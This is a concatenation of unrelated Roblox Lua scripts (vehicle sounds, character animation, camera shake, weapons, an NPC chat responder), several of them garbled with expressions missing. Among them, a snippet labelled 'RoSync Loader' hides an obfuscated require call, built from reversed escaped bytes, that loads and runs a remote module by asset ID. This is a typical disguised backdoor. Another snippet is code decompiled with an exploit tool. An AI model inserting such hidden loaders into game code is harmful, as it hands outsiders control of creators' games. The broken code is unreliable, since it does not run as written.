S.spreadSettings.unAimed.Stand.Idling local currentSpread = 0 local loweringSpread = false local mouseSensitivity = S.sensitivitySettings.Default local aimSensitivity = S.sensitivitySettings.Aim local lastSensUpdate = 0 local ammoInClip = 0 local Stance = 0 local stanceSway = 1 local camSway = 1 local camAng = VEC2() local armTilt = 0 local moveAng = 0 local animCode = 0 local desiredXOffset = 0 local desiredYOffset = 0 local currentXOffset = 0 local currentYOffset = 0 local aimHeadOffset = 0 local recoilAnimMultiplier = 1 local jumpAnimMultiplier = 1 local translationDivisor = 7 local rotationMultiplier = S.momentumSettings.Amplitude.unAimed local armTiltMultiplier = 1 local equipAnimPlaying = false local crossOffset = 0 local camOffsets = { guiScope = { Rot = V3(); }; Reload = { Rot = V3(); Code = nil; }; Recoil = { Rot = V3(); Code = nil; }; } local Anim = { Pos = V3(); Rot = V3(); Ang = 0; Code = 0; } local lastBeat = 0 local gunParts = {} local Connections = {} local Keys = {}
--[[ ___ _______ _ / _ |____/ ___/ / ___ ____ ___ (_)__ / __ /___/ /__/ _ \/ _ `(_-<(_-</ (_-< /_/ |_| \___/_//_/\_,_/___/___/_/___/ SecondLogic @ Inspare ]]
wait(2.5) local FE = workspace.FilteringEnabled local car = script.Parent.Car.Value local handler = car:WaitForChild("AC6_FE_Sounds") local _Tune = require(car["A-Chassis Tune"]) local on = 0 local throt=0 local redline=0 script:WaitForChild("Rev") for i,v in pairs(car.DriveSeat:GetChildren()) do for _,a in pairs(script:GetChildren()) do if v.Name==a.Name then v:Stop() wait() v:Destroy() end end end handler:FireServer("newSound","Rev",car.DriveSeat,script.Rev.SoundId,0,script.Rev.Volume,true) handler:FireServer("playSound","Rev") car.DriveSeat:WaitForChild("Rev") while wait() do local _RPM = script.Parent.Values.RPM.Value if script.Parent.Values.Throttle.Value <= _Tune.IdleThrottle/100 then throt = math.max(.3,throt-.2) else throt = math.min(1,throt+.1) end if script.Parent.Values.RPM.Value > _Tune.Redline-_Tune.RevBounce/4 and script.Parent.Values.Throttle.Value > _Tune.IdleThrottle/100 then redline=.5 else redline=1 end if not script.Parent.IsOn.Value then on=math.max(on-.015,0) else on=1 end local Pitch = math.max((((script.Rev.SetPitch.Value + script.Rev.SetRev.Value*_RPM/_Tune.Redline))*on^2),script.Rev.SetPitch.Value) if FE then handler:FireServer("updateSound","Rev",script.Rev.SoundId,Pitch,script.Rev.Volume) else car.DriveSeat.Rev.Pitch = Pitch end end
--//State of Rockport\\-- --\\CREDITS:brian5001//--
game:GetService("RunService").Heartbeat:Connect(function() rWait(UpdateDelay) local TrsoLV = Trso.CFrame.lookVector local HdPos = Head.CFrame.p local player = getClosestPlayer() local LookAtPart if Neck or Waist then if player then local success, err = pcall(function() LookAtPart = GetValidPartToLookAt(player, PartToLookAt) if LookAtPart then local Dist = nil; local Diff = nil; local is_in_front = Core.CFrame:ToObjectSpace(LookAtPart.CFrame).Z < 0 if is_in_front then if LookingAtValue.Value ~= player then LookingAtValue.Value = player end Dist = (Head.CFrame.p-LookAtPart.CFrame.p).magnitude Diff = Head.CFrame.Y-LookAtPart.CFrame.Y if not IsR6 then LookAt(NeckOrgnC0*Ang(-(aTan(Diff/Dist)*HeadVertFactor), (((HdPos-LookAtPart.CFrame.p).Unit):Cross(TrsoLV)).Y*HeadHorFactor, 0), WaistOrgnC0*Ang(-(aTan(Diff/Dist)*BodyVertFactor), (((HdPos-LookAtPart.CFrame.p).Unit):Cross(TrsoLV)).Y*BodyHorFactor, 0)) else LookAt(NeckOrgnC0*Ang((aTan(Diff/Dist)*HeadVertFactor), 0, (((HdPos-LookAtPart.CFrame.p).Unit):Cross(TrsoLV)).Y*HeadHorFactor)) end elseif LookBackOnNil then LookAt(NeckOrgnC0, WaistOrgnC0) if LookingAtValue.Value then LookingAtValue.Value = nil end end end end) elseif LookBackOnNil then LookAt(NeckOrgnC0, WaistOrgnC0) if LookingAtValue.Value then LookingAtValue.Value = nil end end end end)
-- Signal class
local Signal = {} Signal.__index = Signal function return setmetatable({ _handlerListHead = false, }, Signal) end function Signal:Connect(fn) local connection =, fn) if self._handlerListHead then connection._next = self._handlerListHead self._handlerListHead = connection else self._handlerListHead = connection end return connection end
-- functions
function onRunning(speed) if speed>0 then pose = "Running" else pose = "Standing" end end function onDied() pose = "Dead" end function onJumping() pose = "Jumping" end function onClimbing() pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function moveJump() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = 3.14 LeftShoulder.DesiredAngle = -3.14 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 0 end
while true do R.BrickColor ="Really red") wait(0.3) R.BrickColor ="Really black") wait(0.3) end
do local enabled = false local function ToggleFreecam() if enabled then StopFreecam() else StartFreecam() end enabled = not enabled end local function CheckMacro(macro) for i = 1, #macro - 1 do if not UserInputService:IsKeyDown(macro[i]) then return false end end ToggleFreecam() return true end local function HandleActivationInput(action, state, input) if state == Enum.UserInputState.Begin then if input.KeyCode == FREECAM_MACRO_KB[#FREECAM_MACRO_KB] then CheckMacro(FREECAM_MACRO_KB) --[[if CheckMacro(FREECAM_MACRO_KB) then return Enum.ContextActionResult.Sink end]] end end return Enum.ContextActionResult.Pass end ContextActionService:BindActionAtPriority("FreecamToggle2", HandleActivationInput, false, TOGGLE_INPUT_PRIORITY, FREECAM_MACRO_KB[#FREECAM_MACRO_KB]) end
--[[OMG YAY! First ever reply system, I'll be doing ALLOT of work on this.. It'll end up to be let's say.. 1000+ lines of mixtures of letters forsay? I wanna make this good!]]
hichats = {"Hi","Hello","oh hi","Hi!","Oh hey","Hey","What do you want","What's up"} local head = script.Parent.Head function onPlayerEntered(newPlayer) game.Players.PlayerAdded:connect(onPlayerEntered) function onChatted(msg, recipient, speaker) local source = string.lower(speaker.Name) if (msg == "hi") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hello") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hi!") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hi.") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hello!") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hello.") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hey") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hey!") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end local source = string.lower(speaker.Name) if (msg == "hey.") then game:GetService("Chat"):Chat(head,""..hichats[math.random(1, #hichats)]..", "..speaker.Name,Enum.ChatColor.White) end end end game.Players.PlayerAdded:connect(function(newP) onPlayerEntered(newP) newP.Chatted:connect(function(msg) onChatted(msg, nil, newP) end) end)
-- Decompiled with the Synapse X Luau decompiler.
local v1 = {}; local v2 = require(game.ReplicatedStorage.Modules.Lightning); local v3 = require(game.ReplicatedStorage.Modules.Xeno); local v4 = require(game.ReplicatedStorage.Modules.CameraShaker); local l__TweenService__5 = game.TweenService; local l__Debris__6 = game.Debris; local l__ReplicatedStorage__1 = game.ReplicatedStorage; function v1.RunStompFx(p1, p2, p3, p4) local v7 = l__ReplicatedStorage__1.KillFX[p1].FX:Clone(); v7.Parent = workspace.Ignored.Animations; v7.PrimaryPart.CFrame =; local v8 = l__ReplicatedStorage__1.KillFX[p1].Stomp:Clone(); v8.Parent = p2; v8:Play(); game.Debris:AddItem(v8, 6); game.Debris:AddItem(v7, 6); if p3 and p3:FindFirstChild("Information") then for v9, v10 in pairs(v8:GetDescendants()) do if v10:IsA("BasePart") or v10:IsA("MeshPart") then v10.Color = p3:FindFirstChild("Information").RayColor.Value; end; end; end; for v11, v12 in pairs(p2.Parent:GetDescendants()) do if not (not v12:IsA("BasePart")) or not (not v12:IsA("MeshPart")) or v12:IsA("Decal") then game:GetService("TweenService"):Create(v12,, { Color = Color3.fromRGB(255, 255, 255), Transparency = 1 }):Play(); end; end; for v13, v14 in pairs(v7:GetChildren()) do local v15 = 1200; if math.random(1, 2) == 2 then v15 = -1200; end; game:GetService("TweenService"):Create(v14,, { Transparency = 1, Position = p2.Position +, 2, 0), Size = v14.Size +, 200, 200), Orientation = v14.Orientation +, 0, v15) }):Play(); end; return nil; end; return v1;
--[[ Local Functions ]]
-- function MouseLockController:OnMouseLockToggled() self.isMouseLocked = not self.isMouseLocked if self.isMouseLocked then local cursorImageValueObj: StringValue? = script:FindFirstChild("CursorImage") :: StringValue? if cursorImageValueObj and cursorImageValueObj:IsA("StringValue") and cursorImageValueObj.Value then CameraUtils.setMouseIconOverride(cursorImageValueObj.Value) else if cursorImageValueObj then cursorImageValueObj:Destroy() end cursorImageValueObj ="StringValue") assert(cursorImageValueObj, "") cursorImageValueObj.Name = "CursorImage" cursorImageValueObj.Value = DEFAULT_MOUSE_LOCK_CURSOR cursorImageValueObj.Parent = script CameraUtils.setMouseIconOverride(DEFAULT_MOUSE_LOCK_CURSOR) end else CameraUtils.restoreMouseIcon() end self.mouseLockToggledEvent:Fire() end function MouseLockController:DoMouseLockSwitch(name, state, input) if state == Enum.UserInputState.Begin then self:OnMouseLockToggled() return Enum.ContextActionResult.Sink end return Enum.ContextActionResult.Pass end function MouseLockController:BindContextActions() ContextActionService:BindActionAtPriority(CONTEXT_ACTION_NAME, function(name, state, input) return self:DoMouseLockSwitch(name, state, input) end, false, MOUSELOCK_ACTION_PRIORITY, unpack(self.boundKeys)) end function MouseLockController:UnbindContextActions() ContextActionService:UnbindAction(CONTEXT_ACTION_NAME) end function MouseLockController:IsMouseLocked(): boolean return self.enabled and self.isMouseLocked end function MouseLockController:EnableMouseLock(enable: boolean) if enable ~= self.enabled then self.enabled = enable if self.enabled then -- Enabling the mode self:BindContextActions() else -- Disabling -- Restore mouse cursor CameraUtils.restoreMouseIcon() self:UnbindContextActions() -- If the mode is disabled while being used, fire the event to toggle it off if self.isMouseLocked then self.mouseLockToggledEvent:Fire() end self.isMouseLocked = false end end end game.Players.LocalPlayer.CharacterAdded:Wait() return MouseLockController
-- Sets the parent of all cached parts.
function PartCacheStatic:SetCacheParent(newParent: Instance) assert(getmetatable(self) == PartCacheStatic, ERR_NOT_INSTANCE:format("SetCacheParent", "")) assert(newParent:IsDescendantOf(workspace) or newParent == workspace, "Cache parent is not a descendant of Workspace! Parts should be kept where they will remain in the visible world.") self.CurrentCacheParent = newParent for i = 1, #self.Open do self.Open[i].Parent = newParent end for i = 1, #self.InUse do self.InUse[i].Parent = newParent end end
-- Adds user timing marks for e.g. state updates, suspense, and work loop stuff, -- for an experimental scheduling profiler tool.
exports.enableSchedulingProfiler = _G.__PROFILE__ and _G.__EXPERIMENTAL__
-- if math.abs(g) > 0 then -- -- end
end F.pbrake = function(x) if x then carSeat.PBt:Play() else carSeat.PBf:Play() end end F.updateValue = function(Val, Value) if Val then Val.Value = Value end end F.FMSwitch = function(FM) if carSeat.Stations.mood.Value == 5 then carSeat.Parent.Body.MP.Sound:Stop() carSeat.Stations.mood.Value = 2 scg.Radio.Song.Text = "PRESET 2" elseif carSeat.Stations.mood.Value == 2 then carSeat.Parent.Body.MP.Sound:Stop() carSeat.Stations.mood.Value = 3 scg.Radio.Song.Text = "PRESET 3" elseif carSeat.Stations.mood.Value == 3 then carSeat.Parent.Body.MP.Sound:Stop() carSeat.Stations.mood.Value = 4 scg.Radio.Song.Text = "PRESET 4" elseif carSeat.Stations.mood.Value == 4 then carSeat.Parent.Body.MP.Sound:Stop() carSeat.Stations.mood.Value = 1 scg.Radio.Song.Text = "PRESET 1" elseif carSeat.Stations.mood.Value == 1 then carSeat.Parent.Body.MP.Sound:Stop() carSeat.Stations.mood.Value = 5 scg.Radio.Song.Text = "" end end F.volumech = function(v) carSeat.Parent.Body.MP.Sound.Volume = v scg.Radio.Volume.Text = carSeat.Parent.Body.MP.Sound.Volume end F.updateSong = function(Song) carSeat.Stations.mood.Value = 5 carSeat.Parent.Body.MP.Sound:Stop() wait() carSeat.Parent.Body.MP.Sound.SoundId = "rbxassetid://"..Song wait() carSeat.Parent.Body.MP.Sound:Play() scg.Radio.Song.Text = "CUSTOM" end F.pauseSong = function() carSeat.Stations.mood.Value = 5 carSeat.Parent.Body.MP.Sound:Stop() scg.Radio.Song.Text = "OFF" end F.pitc = function(v) carSeat.Parent.Body.MP.Sound.Pitch = v end script.Parent.OnServerEvent:connect(function(Player, Func, ...) if F[Func] then F[Func](...) end end)
--[[ Last synced 10/19/2020 07:16 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722947559) --[[ ]]--
------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- -- STATE CHANGE HANDLERS
function onRunning(speed) local movedDuringEmote = currentlyPlayingEmote and Humanoid.MoveDirection ==, 0, 0) local speedThreshold = movedDuringEmote and Humanoid.WalkSpeed or 0.75 if speed > speedThreshold then local scale = 16.0 playAnimation("walk", 0.2, Humanoid) setAnimationSpeed(speed / scale) pose = "Running" else if emoteNames[currentAnim] == nil and not currentlyPlayingEmote then playAnimation("idle", 0.2, Humanoid) pose = "Standing" end end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing(speed) local scale = 5.0 playAnimation("climb", 0.1, Humanoid) setAnimationSpeed(speed / scale) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end
-- Represents a CastStateInfo ::
export type CastStateInfo = { UpdateConnection: RBXScriptSignal, HighFidelityBehavior: number, HighFidelitySegmentSize: number, Paused: boolean, Delta: number, TotalRuntime: number, TotalRuntime2: number, DistanceCovered: number, IsActivelySimulatingPenetrate: boolean, IsActivelyResimulating: boolean, CancelHighResCast: boolean, Trajectories: {[number]: CastTrajectory}, TweenTable: GenericTable }
--[[ CameraShaker.CameraShakeInstance cameraShaker =, callbackFunction) CameraShaker:Start() CameraShaker:Stop() CameraShaker:Shake(shakeInstance) CameraShaker:ShakeSustain(shakeInstance) CameraShaker:ShakeOnce(magnitude, roughness [, fadeInTime, fadeOutTime, posInfluence, rotInfluence]) CameraShaker:StartShake(magnitude, roughness [, fadeInTime, posInfluence, rotInfluence]) EXAMPLE: local camShake =, function(shakeCFrame) camera.CFrame = playerCFrame * shakeCFrame end) camShake:Start() -- Explosion shake: camShake:Shake(CameraShaker.Presets.Explosion) wait(1) -- Custom shake: camShake:ShakeOnce(3, 1, 0.2, 1.5) NOTE: This was based entirely on the EZ Camera Shake asset for Unity3D. I was given written permission by the developer, Road Turtle Games, to port this to Roblox. Original asset link: --]]
local CameraShaker = {} CameraShaker.__index = CameraShaker local profileBegin = debug.profilebegin local profileEnd = debug.profileend local profileTag = "CameraShakerUpdate" local V3 = local CF = local ANG = CFrame.Angles local RAD = math.rad local v3Zero = V3() local CameraShakeInstance = require(script.CameraShakeInstance) local CameraShakeState = CameraShakeInstance.CameraShakeState local defaultPosInfluence = V3(0.15, 0.15, 0.15) local defaultRotInfluence = V3(1, 1, 1) CameraShaker.CameraShakeInstance = CameraShakeInstance CameraShaker.Presets = require(script.CameraShakePresets) function, callback) assert(type(renderPriority) == "number", "RenderPriority must be a number (e.g.: Enum.RenderPriority.Camera.Value)") assert(type(callback) == "function", "Callback must be a function") local self = setmetatable({ _running = false; _renderName = "CameraShaker"; _renderPriority = renderPriority; _posAddShake = v3Zero; _rotAddShake = v3Zero; _camShakeInstances = {}; _removeInstances = {}; _callback = callback; }, CameraShaker) return self end function CameraShaker:Start() if (self._running) then return end self._running = true local callback = self._callback game:GetService("RunService"):BindToRenderStep(self._renderName, self._renderPriority, function(dt) profileBegin(profileTag) local cf = self:Update(dt) profileEnd() callback(cf) end) end function CameraShaker:Stop() if (not self._running) then return end game:GetService("RunService"):UnbindFromRenderStep(self._renderName) self._running = false end function CameraShaker:Update(dt) local posAddShake = v3Zero local rotAddShake = v3Zero local instances = self._camShakeInstances -- Update all instances: for i = 1,#instances do local c = instances[i] local state = c:GetState() if (state == CameraShakeState.Inactive and c.DeleteOnInactive) then self._removeInstances[#self._removeInstances + 1] = i elseif (state ~= CameraShakeState.Inactive) then posAddShake = posAddShake + (c:UpdateShake(dt) * c.PositionInfluence) rotAddShake = rotAddShake + (c:UpdateShake(dt) * c.RotationInfluence) end end -- Remove dead instances: for i = #self._removeInstances,1,-1 do local instIndex = self._removeInstances[i] table.remove(instances, instIndex) self._removeInstances[i] = nil end return CF(posAddShake) * ANG(0, RAD(rotAddShake.Y), 0) * ANG(RAD(rotAddShake.X), 0, RAD(rotAddShake.Z)) end function CameraShaker:Shake(shakeInstance) assert(type(shakeInstance) == "table" and shakeInstance._camShakeInstance, "ShakeInstance must be of type CameraShakeInstance") self._camShakeInstances[#self._camShakeInstances + 1] = shakeInstance return shakeInstance end function CameraShaker:ShakeSustain(shakeInstance) assert(type(shakeInstance) == "table" and shakeInstance._camShakeInstance, "ShakeInstance must be of type CameraShakeInstance") self._camShakeInstances[#self._camShakeInstances + 1] = shakeInstance shakeInstance:StartFadeIn(shakeInstance.fadeInDuration) return shakeInstance end function CameraShaker:ShakeOnce(magnitude, roughness, fadeInTime, fadeOutTime, posInfluence, rotInfluence) local shakeInstance =, roughness, fadeInTime, fadeOutTime) shakeInstance.PositionInfluence = (typeof(posInfluence) == "Vector3" and posInfluence or defaultPosInfluence) shakeInstance.RotationInfluence = (typeof(rotInfluence) == "Vector3" and rotInfluence or defaultRotInfluence) self._camShakeInstances[#self._camShakeInstances + 1] = shakeInstance return shakeInstance end function CameraShaker:StartShake(magnitude, roughness, fadeInTime, posInfluence, rotInfluence) local shakeInstance =, roughness, fadeInTime) shakeInstance.PositionInfluence = (typeof(posInfluence) == "Vector3" and posInfluence or defaultPosInfluence) shakeInstance.RotationInfluence = (typeof(rotInfluence) == "Vector3" and rotInfluence or defaultRotInfluence) shakeInstance:StartFadeIn(fadeInTime) self._camShakeInstances[#self._camShakeInstances + 1] = shakeInstance return shakeInstance end return CameraShaker
--[=[ @interface Middleware .Inbound ClientMiddleware? .Outbound ClientMiddleware? @within KnitClient ]=]
type Middleware = { Inbound: ClientMiddleware?, Outbound: ClientMiddleware?, }
-- Left Arm
character:FindFirstChild("RightUpperLeg").LocalTransparencyModifier = 0 character:FindFirstChild("RightLowerLeg").LocalTransparencyModifier = 0 character:FindFirstChild("RightFoot").LocalTransparencyModifier = 0
--returns the wielding player of this tool
function getPlayer() local char = Tool.Parent return game:GetService("Players"):GetPlayerFromCharacter(Character) end function Toss(direction) local handlePos =, 0, Tool.Handle.Position.Z) local spawnPos = Character.Head.Position spawnPos = spawnPos + (direction * 5) Tool.Handle.Transparency = 1 local Object = Tool.Handle:Clone() Object.Parent = workspace Object.Transparency = 1 Object.Swing.Pitch = math.random(90, 110)/100 Object.Swing:Play() Object.CanCollide = true Object.CFrame = Tool.Handle.CFrame Object.Velocity = (direction*AttackVelocity) +,AttackVelocity/7.5,0) Object.Trail.Enabled = true Object.Fuse:Play() Object.Sparks.Enabled = true local rand = 11.25 Object.RotVelocity =,rand),math.random(-rand,rand),math.random(-rand,rand)) Object:SetNetworkOwner(getPlayer()) local ScriptClone = DamageScript:Clone() ScriptClone.Parent = Object ScriptClone.Disabled = false local tag ="ObjectValue") tag.Value = getPlayer() tag.Name = "killer" tag.Parent = Object Tool:Destroy() end script.Parent.Power.OnServerEvent:Connect(function(player, Power) AttackVelocity = Power end) Remote.OnServerEvent:Connect(function(player, mousePosition) if not AttackAble then return end AttackAble = false if Humanoid then Remote:FireClient(getPlayer(), "PlayAnimation", "Animation") end local targetPos = mousePosition.p local lookAt = (targetPos - Character.Head.Position).unit Toss(lookAt) LeftDown = true end) function onLeftUp() LeftDown = false end Tool.Equipped:Connect(function() Character = Tool.Parent Humanoid = Character:FindFirstChildOfClass("Humanoid") end) Tool.Unequipped:Connect(function() Character = nil Humanoid = nil end)
local FORMAT_STR = "Maid does not support type \"%s\"" local DESTRUCTORS = { ["function"] = function(item) item() end; ["RBXScriptConnection"] = function(item) item:Disconnect() end; ["Instance"] = function(item) item:Destroy() end; }
-- Style Options
Flat=true; -- Enables Flat theme / Disables Aero theme ForcedColor=false; -- Forces everyone to have set color & transparency,0,0); -- Changes the Color of the user interface ColorTransparency=.75; -- Changes the Transparency of the user interface Chat=false; -- Enables the custom chat BubbleChat=false; -- Enables the custom bubble chat
------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- -- STATE CHANGE HANDLERS
function onRunning(speed) if speed > 0.5 then local scale = 16.0 playAnimation("walk", 0.2, Humanoid) setAnimationSpeed(speed / scale) pose = "Running" else if emoteNames[currentAnim] == nil then playAnimation("idle", 0.2, Humanoid) pose = "Standing" end end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing(speed) local scale = 5.0 playAnimation("climb", 0.1, Humanoid) setAnimationSpeed(speed / scale) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end
--[[ Init function that creates all the rooms ]]
function RoomManager.init() local roomModels = CollectionService:GetTagged(Constants.Tag.Room) for _, model in pairs(roomModels) do local room = rooms:add(model) room.stateChanged:Connect(RoomManager._updateStatusValues) end RoomManager._flashAlerts() RoomManager._updateStatusValues() workspace:GetPropertyChangedSignal("Gravity"):Connect( function() if workspace.Gravity == 0 then for _, room in pairs(rooms:getAll()) do room:applyMicroVelocityToParts() end end end ) end
--create tables:
for i,part in pairs(model:GetChildren()) do if string.sub(part.Name, 1,1) == "c" then table.insert(c, 1, part) end end for i,part in pairs(model:GetChildren()) do if string.sub(part.Name, 1,1) == "d" then table.insert(d, 1, part) end end function lightOn(T) for i, part in pairs (T) do if part:FindFirstChild("SurfaceLight") then part.SurfaceLight.Enabled = true end if part:FindFirstChild("SpotLight") then part.SpotLight.Enabled = true part.Material = "Neon" end end end function lightOff(T) for i, part in pairs (T) do if part:FindFirstChild("SurfaceLight") then part.SurfaceLight.Enabled = false end if part:FindFirstChild("SpotLight") then part.SpotLight.Enabled = false part.Material = "SmoothPlastic" end end end while true do lightOn(c) wait(0.05) lightOff(c) wait(0.05) lightOn(d) wait(0.05) lightOff(d) wait(0.05) end
-- Create sound instance
local currentSound ="Sound", character.HumanoidRootPart) currentSound.Name = "CurrentSound" currentSound.RollOffMode = Enum.RollOffMode.InverseTapered -- you can experiment with this value currentSound.RollOffMinDistance = 10 -- When should the sound start fading out? (in studs) currentSound.RollOffMaxDistance = 75 -- When should the sound stop being heard? (in studs)
------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------
Stance.OnServerEvent:connect(function(Player, L_97_arg2, Virar, Rendido) local char = Player.Character local Torso = char:WaitForChild("Torso") local Saude = char:WaitForChild("Saude") if char.Humanoid.Health > 0 then local RootPart = char:WaitForChild("HumanoidRootPart") local RootJoint = RootPart:WaitForChild("RootJoint") local Neck = char["Torso"]:WaitForChild("Neck") local RS = char["Torso"]:WaitForChild("Right Shoulder") local LS = char["Torso"]:WaitForChild("Left Shoulder") local RH = char["Torso"]:WaitForChild("Right Hip") local LH = char["Torso"]:WaitForChild("Left Hip") local LeftLeg = char["Left Leg"] local RightLeg = char["Right Leg"] local Proned2 RootJoint.C1 = if L_97_arg2 == 2 and char then TS:Create(RootJoint,, {C0 =,-2.5,1.35)* CFrame.Angles(math.rad(-90),0,math.rad(0))} ):Play() TS:Create(RH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,1.1,0)* CFrame.Angles(math.rad(-180),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,1.1,0)* CFrame.Angles(math.rad(-180),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1.25,0)* CFrame.Angles(math.rad(0),math.rad(0),math.rad(180))} ):Play() elseif L_97_arg2 == 1 and char then TS:Create(RootJoint,, {C0 =,-1,0.25)* CFrame.Angles(math.rad(-10),0,math.rad(0))} ):Play() TS:Create(RH,, {C0 =,-0.35,-0.65)* CFrame.Angles(math.rad(-20),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1.25,-0.625)* CFrame.Angles(math.rad(-60),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-80),math.rad(0),math.rad(180))} ):Play() elseif L_97_arg2 == 0 and char then TS:Create(RootJoint,, {C0 =,0,0)* CFrame.Angles(math.rad(-0),0,math.rad(0))} ):Play() TS:Create(RH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-90),math.rad(0),math.rad(180))} ):Play() end if Virar == 1 then if L_97_arg2 == 0 then TS:Create(RootJoint,, {C0 =,0,0) * CFrame.Angles(math.rad(0),0,math.rad(-30))} ):Play() TS:Create(RH,, {C0 =,-1,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-90),math.rad(0),math.rad(180))} ):Play() elseif L_97_arg2 == 1 then TS:Create(RootJoint,, {C0 =,-1,0.25)* CFrame.Angles(math.rad(-10),0,math.rad(-30))} ):Play() TS:Create(RH,, {C0 =,-0.35,-0.65)* CFrame.Angles(math.rad(-20),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1.25,-0.625)* CFrame.Angles(math.rad(-60),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-80),math.rad(0),math.rad(180))} ):Play() end elseif Virar == -1 then if L_97_arg2 == 0 then TS:Create(RootJoint,, {C0 =,0,0) * CFrame.Angles(math.rad(0),0,math.rad(30))} ):Play() TS:Create(RH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-90),math.rad(0),math.rad(180))} ):Play() elseif L_97_arg2 == 1 then TS:Create(RootJoint,, {C0 =,-1,0.25)* CFrame.Angles(math.rad(-10),0,math.rad(30))} ):Play() TS:Create(RH,, {C0 =,-0.35,-0.65)* CFrame.Angles(math.rad(-20),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1.25,-0.625)* CFrame.Angles(math.rad(-60),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 